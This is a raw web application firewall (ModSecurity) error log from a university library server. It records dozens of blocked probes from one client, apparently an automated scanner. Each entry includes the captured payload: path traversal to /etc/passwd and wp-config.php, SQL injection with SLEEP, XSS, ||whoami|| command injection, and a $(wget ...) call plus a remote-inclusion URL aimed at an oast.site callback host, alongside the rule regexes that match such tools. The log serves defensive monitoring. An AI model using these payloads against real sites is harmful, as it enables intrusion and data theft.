[Tue Aug 29 11:41:30.643704 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: |id found within ARGS:name: |id"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/delsnap.pl"] [unique_id "ZO12@sCo-f0AAAXHqBcAAAAT"]
[Tue Aug 29 11:41:32.410018 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../../../../../ found within ARGS:src: /scripts/simple.php/../../../../../../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php"] [unique_id "ZO12-MCo-f0AAAbo-Z4AAAAi"]
[Tue Aug 29 11:41:32.575369 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:READ.filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:READ.filePath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/operator/fileread"] [unique_id "ZO12-MCo-f0AAAQSWqIAAAA0"]
[Tue Aug 29 11:41:33.494764 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:type: xss\\x22 onmouseover=alert(document.domain) \\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/main/calendar/agenda_list.php"] [unique_id "ZO12-cCo-f0AAAQSWqcAAAA0"]
[Tue Aug 29 11:41:35.539358 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAc8A1MAAAAK"]
[Tue Aug 29 11:41:36.373036 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc0NjIAAAAM"]
[Tue Aug 29 11:41:36.472772 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAcoNaEAAAAF"]
[Tue Aug 29 11:41:38.389293 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13AsCo-f0AAAcoNa4AAAAF"]
[Tue Aug 29 11:41:39.371793 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAcbSLMAAAAv"]
[Tue Aug 29 11:41:40.427542 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAcqJRUAAAAG"]
[Tue Aug 29 11:41:42.769458 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAc8A4UAAAAK"]
[Tue Aug 29 11:41:45.529415 2023] [:error] [pid 1859] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26guc3xghp9ir45s.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAdDO1oAAAAV"]
[Tue Aug 29 11:41:46.484389 2023] [:error] [pid 1859] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAdDO2EAAAAV"]
[Tue Aug 29 11:41:49.387245 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAcoNd8AAAAF"]
[Tue Aug 29 11:41:56.455106 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdECXcAAAAW"]
[Tue Aug 29 11:41:57.550764 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAdYA@cAAAAe"]
[Tue Aug 29 11:41:59.540392 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAdV7X4AAAAa"]
[Tue Aug 29 11:42:00.384171 2023] [:error] [pid 1849] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gxssrmwonafucz.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26gxssrmwonafucz.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAc5SoMAAAAQ"]
[Tue Aug 29 11:42:01.410059 2023] [:error] [pid 1865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdJqRQAAAAC"]
[Tue Aug 29 11:42:04.448697 2023] [:error] [pid 1832] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAcoNggAAAAF"]
[Tue Aug 29 11:42:05.427171 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAcvBigAAAAJ"]
[Tue Aug 29 11:42:06.473100 2023] [:error] [pid 1880] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAdYA-0AAAAe"]
[Tue Aug 29 11:42:07.494739 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAddJpwAAAAh"]
[Tue Aug 29 11:42:08.355048 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13IMCo-f0AAAddJp4AAAAh"]
[Tue Aug 29 11:42:08.364575 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAdb7hkAAAAb"]
[Tue Aug 29 11:42:09.380563 2023] [:error] [pid 1768] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IcCo-f0AAAbo-agAAAAi"]
[Tue Aug 29 11:42:09.402665 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAc36zgAAAAO"]
[Tue Aug 29 11:42:11.398322 2023] [:error] [pid 1882] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdaZNsAAAAM"]
[Tue Aug 29 11:42:11.435892 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdQ3ewAAAAV"]
[Tue Aug 29 11:42:12.420583 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdb7iMAAAAb"]
[Tue Aug 29 11:42:14.357068 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdOePwAAAAS"]
[Tue Aug 29 11:42:14.402796 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAdSZK4AAAAX"]
